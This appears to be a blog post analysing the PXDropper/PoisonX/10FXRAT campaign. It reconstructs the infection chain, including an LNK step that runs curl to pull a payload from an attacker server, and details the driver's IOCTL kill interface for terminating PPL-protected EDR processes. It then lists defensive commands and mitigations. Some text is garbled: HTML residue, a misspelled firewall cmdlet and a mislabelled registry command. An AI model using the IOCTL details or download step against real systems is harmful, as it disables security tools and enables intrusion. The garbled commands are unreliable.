Listen to this Post
Introduction:
The cybersecurity landscape has witnessed a concerning evolution in adversary tradecraft, with threat actors increasingly shifting their attacks from user-mode to kernel-level operations. The recently uncovered PXDropper, PoisonX driver, and 10FXRAT malware chain exemplifies this dangerous trend, leveraging the Bring Your Own Vulnerable Driver (BYOVD) technique to dismantle endpoint security controls at their core. This sophisticated campaign, primarily targeting Japanese organizations, demonstrates how attackers exploit Microsoft-signed, vulnerable drivers to gain kernel-level privileges and operate with near-total impunity below traditional security defenses.
Learning Objectives:
- Understand the complete infection chain from spearphishing to kernel-level defense evasion
- Learn how BYOVD attacks abuse signed kernel drivers to disable EDR and AV solutions
- Master detection and mitigation strategies for defending against kernel-mode threats
- Gain hands-on knowledge of Windows driver security, IOCTL exploitation, and process termination techniques
You Should Know:
- The PXDropper Infection Chain: From Phishing to Kernel Persistence
The attack campaign, observed in April 2026 and continuing through subsequent months, initiates with a highly targeted spearphishing email. Attackers, impersonating organizational representatives, use human resources-themed decoys to lure victims into clicking malicious links. These links point to Google Cloud Storage-hosted ZIP archives containing malicious LNK files or executable payloads.
When the victim executes the LNK file, it invokes `curl.exe` to retrieve the PXDropper payload from the attacker-controlled server. The LNK file also contains an embedded decoy document that is opened to distract the victim while the malware executes in the background. This multi-stage approach demonstrates the attackers’ sophisticated understanding of social engineering and defense evasion.
PXDropper serves as the central deployment mechanism, containing embedded components: the PoisonX kernel driver, the 10FXRAT executable (usoclient64.exe), a DLL side-loading component (dnssd.dll), an encrypted payload (runtime.bin), and supporting libraries.
2. Understanding BYOVD: The Kernel-Level Threat
Bring Your Own Vulnerable Driver represents one of the most dangerous defense evasion techniques currently in use. In BYOVD attacks, adversaries deploy a legitimate but vulnerable driver—typically signed by Microsoft—onto a victim’s system. Because 64-bit Windows enforces Driver Signature Enforcement (DSE), only signed drivers can load, forcing attackers to discover and weaponize existing signed drivers with security flaws.
The PoisonX driver exemplifies this approach, with researchers identifying over 15 signed driver versions that were undetectable by antivirus software, achieving a VirusTotal score of 0/71 detections. This driver, carrying a valid Microsoft Hardware Compatibility signature, appeared entirely legitimate to the operating system.
The core vulnerability lies in undocumented IOCTL (Input/Output Control) routines. Specifically, PoisonX.sys exposes a device interface that accepts a process ID (PID) as input and terminates the target process from kernel mode. This bypasses Protected Process Light (PPL) protections because `ZwOpenProcess` from kernel mode does not enforce the same restrictions as user-mode calls. The symbolic link `\\.{F8284233-48F4-4680-ADDD-F8284233}` and IOCTL code `0x22E010` were identified as the kill command interface.
Later campaign variants evolved to use other signed drivers including ASUSTeK Computer’s `EneIo64.sys` and Microsoft’s procexp.sys, demonstrating the adaptability of BYOVD tactics.
- 10FXRAT (PoisonX RAT): The Modular Remote Access Tool
Following driver deployment, PXDropper extracts and executes the 10FXRAT-related components. The execution flow leverages DLL side-loading through usoclient64.exe—a legitimate Windows executable—which loads the malicious dnssd.dll. This DLL decrypts `runtime.bin` and executes the 10FXRAT payload entirely in memory, avoiding disk-based detection.
10FXRAT provides attackers with extensive remote access capabilities including:
– Host reconnaissance and system profiling
– Remote command execution
– SOCKS5 tunneling for network pivoting
– Plugin-based architecture for capability expansion
The RAT also implements anti-analysis checks, registry modifications, and persistence mechanisms to maintain foothold on compromised systems. Researchers have documented hard-coded command-and-control IP addresses associated with the operation, and network traffic analysis reveals a distinctive `0x58463031` magic value in TCP payloads.
4. Step-by-Step Attack Execution Analysis
The complete attack flow can be reconstructed as follows:
Step 1: Initial Access
Victim receives spearphishing email with Google Cloud Storage link LNK file downloaded from cloud storage
Step 2: LNK Execution
LNK file executes: curl.exe -o [bash] [attacker-cloud-url] Decoy document opens to distract victim
Step 3: PXDropper Deployment
PXDropper executes and performs: 1. Extracts PoisonX.sys driver 2. Extracts 10FXRAT components (usoclient64.exe, dnssd.dll, runtime.bin, vcruntime140.dll) 3. Installs and loads PoisonX driver
Step 4: BYOVD Defense Evasion
PoisonX driver loaded with kernel privileges Attacker sends IOCTL 0x22E010 with target PID to kill EDR/AV processes Security tools disabled at kernel level
Step 5: RAT Execution
usoclient64.exe launched (legitimate Windows binary) Malicious dnssd.dll loaded via DLL side-loading runtime.bin decrypted and 10FXRAT executed in memory
Step 6: Post-Compromise Activity
10FXRAT establishes C2 communication Host reconnaissance performed Additional plugins loaded as needed
5. Defensive Measures and Mitigation Strategies
Given the sophistication of BYOVD-based attacks, defenders must implement multi-layered protection:
Monitoring and Detection:
- Monitor for unexpected driver installation activity, particularly unsigned or suspiciously signed drivers
- Detect creation of services with randomized HID-style filenames
- Monitor registry changes adding Microsoft Defender exclusions or disabling Defender services
- Block outbound traffic to identified C2 IP ranges
- Network monitoring for `0x58463031` magic value in TCP payloads
Windows Security Hardening:
- Enable Hypervisor-protected Code Integrity (HVCI) and the Microsoft Vulnerable Driver Blocklist
- Navigate to Windows Security → Device Security → Core Isolation → Toggle on Microsoft Vulnerable Driver Blocklist
- Consider Windows Defender Application Control (WDAC) policies to restrict kernel-mode driver loading
Incident Response:
- Immediately isolate affected endpoints upon detection
- Unload the PoisonX driver where possible using `sc stop
` and `sc delete [bash]` - Terminate all 10FXRAT processes</li> <li>Restore altered registry settings and re-enable Microsoft Defender protections</li> <li>Perform full forensic investigation to identify persistence mechanisms</li> </ul> <h2 style="color: yellow;">Linux/Windows Command Examples for Defenders:</h2> [bash] Windows: Check for suspicious driver services Get-Service | Where-Object {$<em>.DisplayName -match "random|hid" -or $</em>.StartType -eq "Auto"} Windows: View loaded kernel drivers driverquery /v | findstr /i "poison eneio procexp" Windows: Monitor driver load events (PowerShell) Get-WinEvent -LogName "System" | Where-Object {$<em>.Id -eq 7045 -and $</em>.Message -match "driver"} Windows: Block outbound C2 traffic (example) New-1etFirewallRule -DisplayName "Block PoisonX C2" -Direction Outbound -RemoteAddress [bash] -Action Block Windows: Enable Vulnerable Driver Blocklist via Registry reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled /t REG_DWORD /d 1 /f Linux: Monitor for suspicious kernel module loading (auditd) auditctl -w /sbin/insmod -p x -k kernel_module_load auditctl -w /sbin/modprobe -p x -k kernel_module_load6. Technical Deep Dive: PoisonX Driver Reverse Engineering
Reverse engineering of the PoisonX driver reveals critical technical details about its operation. The driver’s dispatch handler processes IOCTL requests, with the kill routine following a specific pattern:
- Read PID string: The `DeviceIoControl` input buffer is treated as a null-terminated ASCII string containing the target PID in decimal form
- Convert to integer: The code calls `atoi()` to convert the string to a numeric PID
- Terminate process: Calls `TerminateProcess` helper with the PID
- Return status: Writes “ok” to output buffer on success
The `TerminateProcess` helper uses:
– `ZwOpenProcess` to obtain a handle to the target PID from kernel mode (bypassing PPL restrictions)
– `ZwTerminateProcess` to forcefully terminate the processThis technique is particularly dangerous because it bypasses the Protected Process Light protections that normally prevent user-mode termination of critical security processes. CrowdStrike Falcon’s sensor, running under PPL, was specifically targeted by this driver.
What Undercode Say:
- BYOVD represents a fundamental shift in adversary capabilities, moving the battlefield from user-mode to kernel-mode where traditional EDR solutions are blind
- The use of Microsoft-signed drivers with 0/71 detection rates demonstrates the inadequacy of signature-based security approaches
The PoisonX campaign illustrates a critical vulnerability in the Windows security model: trusted, signed drivers can be weaponized to destroy the very security controls they were meant to protect. Organizations must recognize that kernel-level attacks are no longer theoretical—they are actively deployed against enterprises. The evolution from custom PoisonX drivers to weaponizing legitimate drivers like EneIo64.sys and procexp.sys shows attackers adapting faster than many defensive measures can respond. This campaign also highlights the importance of threat intelligence sharing, as the activity has been observed targeting both Japanese and Chinese organizations, suggesting a broader regional campaign.
Prediction:
- -1 The continued weaponization of signed drivers will lead to an arms race between attackers discovering new vulnerable drivers and Microsoft’s blocklist updates, creating an ongoing cat-and-mouse dynamic
- -1 As BYOVD techniques become commoditized, we will see increased adoption by ransomware groups and less sophisticated threat actors, expanding the attack surface beyond APT-level campaigns
- +1 Microsoft and security vendors will accelerate development of kernel-level monitoring and behavioral detection, potentially implementing stricter driver signing requirements and real-time IOCTL analysis
- -1 The 10FXRAT campaign’s adaptability suggests attackers will continue refining their toolset, potentially incorporating additional vulnerable drivers and evasion techniques to maintain operational effectiveness
- +1 Increased awareness and adoption of HVCI, WDAC, and vulnerable driver blocklists will provide organizations with effective countermeasures, though implementation complexity may delay widespread deployment
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by ThousandsIT/Security Reporter URL:
Reported By: Flavioqueiroz Byovd – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
